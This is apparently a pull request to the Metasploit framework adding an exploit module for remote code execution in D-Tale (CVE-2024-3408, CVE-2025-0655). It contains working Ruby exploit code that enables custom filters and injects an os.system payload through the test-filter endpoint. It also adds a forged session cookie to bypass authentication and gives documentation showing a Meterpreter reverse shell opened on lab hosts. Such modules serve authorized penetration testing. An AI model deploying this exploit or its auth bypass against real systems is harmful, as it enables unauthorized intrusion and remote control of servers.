### PR TITLE
Add D-Tale RCE module (CVE-2024-3408, CVE-2025-0655)

### DIFF
--- a/documentation/modules/exploit/linux/http/dtale_rce_cve_2025_0655.md
+++ b/documentation/modules/exploit/linux/http/dtale_rce_cve_2025_0655.md
@@ -13,6 +13,8 @@ The vulnerability affects:
 This module was successfully tested on:
 
     * D-Tale 3.15.1 installed on Ubuntu 24.04
+    * D-Tale 3.12.0 installed on Ubuntu 22.04
+    * D-Tale 3.10.0 installed on Ubuntu 22.04
 
 
 ### Installation
@@ -56,8 +58,8 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
    Name            Current Setting  Required  Description
    ----            ---------------  --------  -----------
    FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
-   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
+   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  true             yes       Attempt to run payload without touching disk, Linux ≥3.17 only
    FETCH_SRVHOST                    no        Local IP to use for serving payload
    FETCH_SRVPORT   8080             yes       Local port to use for serving payload
    FETCH_URIPATH                    no        Local URI to use for serving payload
@@ -69,7 +71,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
 
    Name                Current Setting  Required  Description
    ----                ---------------  --------  -----------
-   FETCH_FILENAME      SOizTtsyojZ      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_FILENAME      vxItPQvVMkW      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
 
 
@@ -83,21 +85,21 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
-msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > run lhost=192.168.56.1 rhost=192.168.56.16
+msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > run lhost=192.168.56.1 rhost=192.168.56.17
 [*] Started reverse TCP handler on 192.168.56.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 3.15.1 detected.
 [*] Use data_id: 1
 [*] Updated the enable_custom_filters to true.
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:36278) at 2025-02-23 09:29:16 +0900
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:34796) at 2025-03-01 11:37:14 +0900
 [*] Successfully executed the payload.
 [*] Successfully cleaned up data_id: 1
 
 meterpreter > getuid
 Server username: ubu
 meterpreter > sysinfo
-Computer     : 192.168.56.16
-OS           : Ubuntu 24.04 (Linux 6.8.0-51-generic)
+Computer     : 192.168.56.17
+OS           : Ubuntu 22.04 (Linux 6.8.0-52-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux

--- a/documentation/modules/exploit/linux/http/dtale_rce_cve_2025_0655.md
+++ b/documentation/modules/exploit/linux/http/dtale_rce_cve_2025_0655.md
@@ -8,13 +8,16 @@ Once enabled, the /test-filter endpoint of the Custom Filters functionality can 
 
 The vulnerability affects:
 
-    * 3.10.0 <= D-Tale <= 3.15.1
+    * D-Tale <= 3.15.1
 
 This module was successfully tested on:
 
     * D-Tale 3.15.1 installed on Ubuntu 24.04
     * D-Tale 3.12.0 installed on Ubuntu 22.04
     * D-Tale 3.10.0 installed on Ubuntu 22.04
+    * D-Tale 3.0.0 installed on Ubuntu 22.04
+    * D-Tale 2.5.1 installed on Ubuntu 22.04
+    * D-Tale 2.4.0 installed on Ubuntu 22.04
 
 
 ### Installation

--- a/documentation/modules/exploit/linux/http/dtale_rce_cve_2025_0655.md
+++ b/documentation/modules/exploit/linux/http/dtale_rce_cve_2025_0655.md
@@ -1,0 +1,105 @@
+## Vulnerable Application
+
+This exploit effectively serves as a bypass for CVE-2024-3408.
+An attacker can override global state to enable custom filters, which then facilitates remote code execution.
+Specifically, this vulnerability leverages the ability to manipulate global application settings
+to activate the enable_custom_filters feature, typically restricted to trusted environments.
+Once enabled, the /test-filter endpoint of the Custom Filters functionality can be exploited to execute arbitrary system commands.
+
+The vulnerability affects:
+
+    * 3.10.0 <= D-Tale <= 3.15.1
+
+This module was successfully tested on:
+
+    * D-Tale 3.15.1 installed on Ubuntu 24.04
+
+
+### Installation
+
+1. `pip install 'dtale==3.15.1'`
+
+2. `dtale --host 0.0.0.0`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/dtale_rce_cve_2025_0655`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/dtale_rce_cve_2025_0655
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > options
+
+Module options (exploit/linux/http/dtale_rce_cve_2025_0655):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    40000            yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST                            yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_FILELESS is false:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      SOizTtsyojZ      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > run lhost=192.168.56.1 rhost=192.168.56.16
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 3.15.1 detected.
+[*] Use data_id: 1
+[*] Updated the enable_custom_filters to true.
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:36278) at 2025-02-23 09:29:16 +0900
+[*] Successfully executed the payload.
+[*] Successfully cleaned up data_id: 1
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer     : 192.168.56.16
+OS           : Ubuntu 24.04 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```

--- a/documentation/modules/exploit/linux/http/dtale_rce_cve_2025_0655.md
+++ b/documentation/modules/exploit/linux/http/dtale_rce_cve_2025_0655.md
@@ -61,8 +61,8 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
    Name            Current Setting  Required  Description
    ----            ---------------  --------  -----------
    FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
-   FETCH_FILELESS  true             yes       Attempt to run payload without touching disk, Linux ≥3.17 only
+   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
    FETCH_SRVHOST                    no        Local IP to use for serving payload
    FETCH_SRVPORT   8080             yes       Local port to use for serving payload
    FETCH_URIPATH                    no        Local URI to use for serving payload
@@ -74,7 +74,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
 
    Name                Current Setting  Required  Description
    ----                ---------------  --------  -----------
-   FETCH_FILENAME      vxItPQvVMkW      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_FILENAME      agAyokIhdJZ      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
 
 
@@ -94,7 +94,7 @@ msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > run lhost=192.168.56.1 rhost=
 [+] The target appears to be vulnerable. Version 3.15.1 detected.
 [*] Use data_id: 1
 [*] Updated the enable_custom_filters to true.
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:34796) at 2025-03-01 11:37:14 +0900
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:33210) at 2025-03-03 20:49:53 +0900
 [*] Successfully executed the payload.
 [*] Successfully cleaned up data_id: 1
 

--- a/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
+++ b/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
@@ -1,0 +1,150 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'D-Tale RCE',
+        'Description' => %q{
+          This exploit effectively serves as a bypass for CVE-2024-3408.
+          An attacker can override global state to enable custom filters, which then facilitates remote code execution.
+          Specifically, this vulnerability leverages the ability to manipulate global application settings to activate the enable_custom_filters feature, typically restricted to trusted environments.
+          Once enabled, the /test-filter endpoint of the Custom Filters functionality can be exploited to execute arbitrary system commands.
+        },
+        'Author' => [
+          'taiphung217',      # Vulnerability discovery and PoC
+          'Takahiro Yokoyama' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-3408'],
+          ['CVE', '2025-0655'],
+          ['URL', 'https://huntr.com/bounties/f63af7bd-5438-4b36-a39b-4c90466cff13'],
+        ],
+        'Platform' => %w[linux],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                # defaults to cmd/linux/http/aarch64/meterpreter/reverse_tcp
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => {
+          'FETCH_DELETE' => true
+        },
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '\'"'
+        },
+        'DisclosureDate' => '2025-02-05',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(40000),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'dtale/popup/upload')
+    })
+    return Exploit::CheckCode::Unknown unless res&.code == 200
+
+    html_document = res&.get_html_document
+    return Exploit::CheckCode::Unknown('Failed to get html document.') if html_document.blank?
+
+    version_element = html_document.xpath('//*[@id="version"]/@value')
+    return Exploit::CheckCode::Unknown('Failed to get version element.') if version_element.blank?
+
+    version = Rex::Version.new(version_element&.text)
+    return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.") unless version.between?(Rex::Version.new('3.10.0'), Rex::Version.new('3.15.1'))
+
+    Exploit::CheckCode::Appears("Version #{version} detected.")
+  end
+
+  def exploit
+    # Create a new MIME message (multipart form data)
+    mime = Rex::MIME::Message.new
+    # Add the file part to the body
+    fname = "#{rand_text_alpha(3)}.csv"
+    mime.add_part(
+      "#{rand_text_alpha(1)},#{rand_text_alpha(1)}\n#{rand_text_numeric(1)},#{rand_text_numeric(1)}",
+      'text/csv',
+      nil,
+      "form-data; name=\"#{fname}\"; filename=\"#{fname}\""
+    )
+    # Add additional form data
+    mime.add_part('true', nil, nil, 'form-data; name="header"')
+    mime.add_part('comma', nil, nil, 'form-data; name="separatorType"')
+    mime.add_part('', nil, nil, 'form-data; name="separator"')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'dtale/upload'),
+      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+      'data' => mime.to_s
+    })
+    @data_id = res&.get_json_document&.fetch('data_id', nil)
+    fail_with(Failure::Unknown, 'Failed to get data_id from response.') unless @data_id
+    print_status("Use data_id: #{@data_id}")
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "dtale/update-settings/#{@data_id}"),
+      'vars_get' => {
+        'settings' => { 'enable_custom_filters' => true }.to_json
+      }
+    })
+    fail_with(Failure::Unknown, 'Failed to update the settings.') unless res&.get_json_document&.fetch('success', nil)
+    print_status('Updated the enable_custom_filters to true.')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "dtale/test-filter/#{@data_id}"),
+      'vars_get' => {
+        'query' => "@pd.core.frame.com.builtins.__import__('os').system('#{payload.encoded}')",
+        'save' => true
+      }
+    })
+    fail_with(Failure::Unknown, 'Failed to execute the payload.') unless res&.get_json_document&.fetch('success', nil)
+    print_status('Successfully executed the payload.')
+  end
+
+  def cleanup
+    super
+
+    if @data_id
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'dtale/cleanup-datasets'),
+        'vars_get' => {
+          'dataIds' => @data_id
+        }
+      })
+      print_status("Failed to clean up data_id: #{@data_id}") unless res&.get_json_document&.fetch('success', nil)
+      print_status("Successfully cleaned up data_id: #{@data_id}")
+    end
+  end
+
+end

--- a/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
+++ b/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     return Exploit::CheckCode::Unknown unless res&.code == 200
 
-    html_document = res&.get_html_document
+    html_document = res.get_html_document
     return Exploit::CheckCode::Unknown('Failed to get html document.') if html_document.blank?
 
     version_element = html_document.xpath('//*[@id="version"]/@value')

--- a/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
+++ b/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         ],
         'DefaultOptions' => {
-          'FETCH_FILELESS' => true
+          'FETCH_DELETE' => true
         },
         'DefaultTarget' => 0,
         'Payload' => {

--- a/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
+++ b/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('Failed to get version element.') if version_element.blank?
 
     version = Rex::Version.new(version_element&.text)
-    return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.") unless version.between?(Rex::Version.new('3.10.0'), Rex::Version.new('3.15.1'))
+    return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.") unless version <= Rex::Version.new('3.15.1')
 
     Exploit::CheckCode::Appears("Version #{version} detected.")
   end

--- a/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
+++ b/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
@@ -9,6 +9,14 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
 
+  # forge a cookie in case there was authentication enabled:
+  # import hashlib
+  # from itsdangerous import URLSafeTimedSerializer # pip install itsdangerous
+  # signer_kwargs = { "key_derivation" : "hmac", "digest_method" : staticmethod(hashlib.sha1) }
+  # ser = URLSafeTimedSerializer("Dtale", salt="cookie-session", signer_kwargs=signer_kwargs)
+  # session = ser.dumps({"logged_in" : True, "username" : "whatever"})
+  SESSION = 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoid2hhdGV2ZXIifQ.Z8Jdmw.zUb6b2uEm9ZDKWIOsw2A1xLIuLc'
+
   def initialize(info = {})
     super(
       update_info(
@@ -67,7 +75,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'dtale/popup/upload')
+      'uri' => normalize_uri(target_uri.path, 'dtale/popup/upload'),
+      'headers' => {
+        'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
+      }
     })
     return Exploit::CheckCode::Unknown unless res&.code == 200
 
@@ -103,7 +114,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'dtale/upload'),
       'ctype' => "multipart/form-data; boundary=#{mime.bound}",
-      'data' => mime.to_s
+      'data' => mime.to_s,
+      'headers' => {
+        'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
+      }
     })
     @data_id = res&.get_json_document&.fetch('data_id', nil)
     fail_with(Failure::Unknown, 'Failed to get data_id from response.') unless @data_id
@@ -114,6 +128,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, "dtale/update-settings/#{@data_id}"),
       'vars_get' => {
         'settings' => { 'enable_custom_filters' => true }.to_json
+      },
+      'headers' => {
+        'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
       }
     })
     fail_with(Failure::Unknown, 'Failed to update the settings.') unless res&.get_json_document&.fetch('success', nil)
@@ -125,6 +142,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => {
         'query' => "@pd.core.frame.com.builtins.__import__('os').system('#{payload.encoded}')",
         'save' => true
+      },
+      'headers' => {
+        'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
       }
     })
     print_status('Successfully executed the payload.')
@@ -139,6 +159,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => normalize_uri(target_uri.path, 'dtale/cleanup-datasets'),
         'vars_get' => {
           'dataIds' => @data_id
+        },
+        'headers' => {
+          'Cookie' => "session=#{SESSION}" # Set the JWT token as a cookie
         }
       })
       print_status("Failed to clean up data_id: #{@data_id}") unless res&.get_json_document&.fetch('success', nil)

--- a/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
+++ b/modules/exploits/linux/http/dtale_rce_cve_2025_0655.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         ],
         'DefaultOptions' => {
-          'FETCH_DELETE' => true
+          'FETCH_FILELESS' => true
         },
         'DefaultTarget' => 0,
         'Payload' => {
@@ -119,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unknown, 'Failed to update the settings.') unless res&.get_json_document&.fetch('success', nil)
     print_status('Updated the enable_custom_filters to true.')
 
-    res = send_request_cgi({
+    send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, "dtale/test-filter/#{@data_id}"),
       'vars_get' => {
@@ -127,7 +127,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'save' => true
       }
     })
-    fail_with(Failure::Unknown, 'Failed to execute the payload.') unless res&.get_json_document&.fetch('success', nil)
     print_status('Successfully executed the payload.')
   end
 


### PR DESCRIPTION
Add module about [CVE-2025-0655](https://huntr.com/bounties/f63af7bd-5438-4b36-a39b-4c90466cff13).
If there is an open D-Tale, a remote attacker can send requests to execute arbitrary system commands.

## Vulnerable Application

This exploit effectively serves as a bypass for CVE-2024-3408.
An attacker can override global state to enable custom filters, which then facilitates remote code execution.
Specifically, this vulnerability leverages the ability to manipulate global application settings
to activate the enable_custom_filters feature, typically restricted to trusted environments.
Once enabled, the /test-filter endpoint of the Custom Filters functionality can be exploited to execute arbitrary system commands.

The vulnerability affects:

    * D-Tale <= 3.15.1

This module was successfully tested on:

    * D-Tale 3.15.1 installed on Ubuntu 24.04
    * D-Tale 3.12.0 installed on Ubuntu 22.04
    * D-Tale 3.10.0 installed on Ubuntu 22.04
    * D-Tale 3.0.0 installed on Ubuntu 22.04
    * D-Tale 2.5.1 installed on Ubuntu 22.04
    * D-Tale 2.4.0 installed on Ubuntu 22.04


### Installation

1. `pip install 'dtale==3.15.1'`

2. `dtale --host 0.0.0.0`


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/dtale_rce_cve_2025_0655`
4. Do: `run lhost=<lhost> rhost=<rhost>`
5. You should get a meterpreter


## Scenarios
```
msf6 > use exploit/linux/http/dtale_rce_cve_2025_0655
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > run lhost=192.168.56.1 rhost=192.168.56.16
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.15.1 detected.
[*] Use data_id: 1
[*] Updated the enable_custom_filters to true.
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:60524) at 2025-02-23 09:35:11 +0900
[*] Successfully executed the payload.
[*] Successfully cleaned up data_id: 1

meterpreter > getuid
Server username: ubu
meterpreter > sysinfo
Computer     : 192.168.56.16
OS           : Ubuntu 24.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
